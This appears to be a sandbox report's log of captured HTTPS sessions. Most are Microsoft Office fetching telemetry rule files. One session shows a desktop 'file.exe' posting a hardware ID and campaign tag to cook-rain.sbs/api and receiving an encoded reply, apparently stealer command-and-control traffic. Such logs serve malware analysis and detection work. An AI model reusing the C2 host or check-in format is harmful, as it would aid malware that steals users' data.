                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:28 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:29 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                            x-ms-request-id: 361c5568-301e-005d-3fb2-3be448000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141729Z-r1d97b99577n5jhbhC1TEB74vn0000000aeg000000009cx6
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:29 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            56192.168.2.64976813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:30 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                            x-ms-request-id: 76e93f39-101e-0034-5559-3b96ff000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141731Z-178bfbc474bp8mkvhC1NYCzqnn00000001bg00000000ku5d
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            57192.168.2.64976713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:30 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                            x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141731Z-1777c6cb7544nvmshC1TEBf7qc0000000az000000000g2dq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            58192.168.2.64977013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:30 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                            x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141731Z-1777c6cb754gvvgfhC1TEBz4rg0000000b7000000000fna8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            59192.168.2.64976913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:30 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                            x-ms-request-id: 79192ebf-401e-0035-7e68-3b82d8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141731Z-178bfbc474bw8bwphC1NYC38b400000001f0000000006eqm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            60192.168.2.64977113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                            x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141731Z-178bfbc474btrnf9hC1NYCb80g00000001qg00000000hb5w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            61192.168.2.649772188.114.97.34434784C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 88
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-21 14:17:31 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 31 32 35 34 32 45 37 33 34 39 32 46 45 32 41 43 34 41 46 46 35 41 44 45 43 39 45 36 42 44 37 37
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=12542E73492FE2AC4AFF5ADEC9E6BD77
                                                                                                                                                                                                            2024-11-21 14:17:32 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:31 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qhr5m9rn3bk6chje06qon30ide; expires=Mon, 17-Mar-2025 08:04:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1goFpy4LPfZ3QhqkGALYmjub4Uy7Rn0kQbW5kd45RbdABiwTcez3uIPe%2F%2BynMM8hM1ticOQ4bQ1ZlFUwJ%2F89iPKr24BNyHS3b%2Fv8gxXtS7Q36ZrO13ZmYboQhv5NeOyu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e614dc4ebc50f37-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1495&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=985&delivery_rate=1839949&cwnd=127&unsent_bytes=0&cid=354bc55451e05cf3&ts=737&x=0"
                                                                                                                                                                                                            2024-11-21 14:17:32 UTC214INData Raw: 64 30 0d 0a 73 56 73 54 7a 6a 6e 6d 37 49 63 53 33 78 52 77 53 6f 50 51 54 47 36 57 2f 6c 61 33 4f 4d 64 47 68 4a 51 64 4b 38 39 32 49 35 7a 71 49 44 47 37 47 39 7a 4f 37 32 61 72 5a 45 6f 57 72 49 78 6a 58 36 37 4c 65 49 55 4a 38 6d 69 31 70 53 34 46 2f 6b 42 2f 73 39 34 39 64 5a 49 57 67 6f 6e 68 50 4c 70 73 46 57 69 76 38 69 6f 61 74 4d 52 6d 6d 78 71 69 5a 4c 36 6c 59 41 65 30 56 46 61 2b 69 33 6c 37 75 6b 32 57 31 74 73 39 67 7a 74 42 63 72 62 2b 66 6c 2b 6a 30 47 65 47 43 2b 6c 33 73 73 67 79 57 4c 73 54 51 76 48 74 64 47 47 76 56 34 4b 44 36 6a 79 36 62 42 56 6f 72 2f 49 71 47 72 54 45 5a 70 73 61 6f 6d 53 2b 70 47 42 32 0d 0a
                                                                                                                                                                                                            Data Ascii: d0sVsTzjnm7IcS3xRwSoPQTG6W/la3OMdGhJQdK892I5zqIDG7G9zO72arZEoWrIxjX67LeIUJ8mi1pS4F/kB/s949dZIWgonhPLpsFWiv8ioatMRmmxqiZL6lYAe0VFa+i3l7uk2W1ts9gztBcrb+fl+j0GeGC+l3ssgyWLsTQvHtdGGvV4KD6jy6bBVor/IqGrTEZpsaomS+pGB2
                                                                                                                                                                                                            2024-11-21 14:17:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            62192.168.2.64977313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:32 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                            x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141733Z-178bfbc474bgvl54hC1NYCsfuw00000001ng000000004ze7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            63192.168.2.64977413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:33 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                            x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141733Z-178bfbc474btvfdfhC1NYCa2en00000001r00000000065t7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            64192.168.2.64977513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:33 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
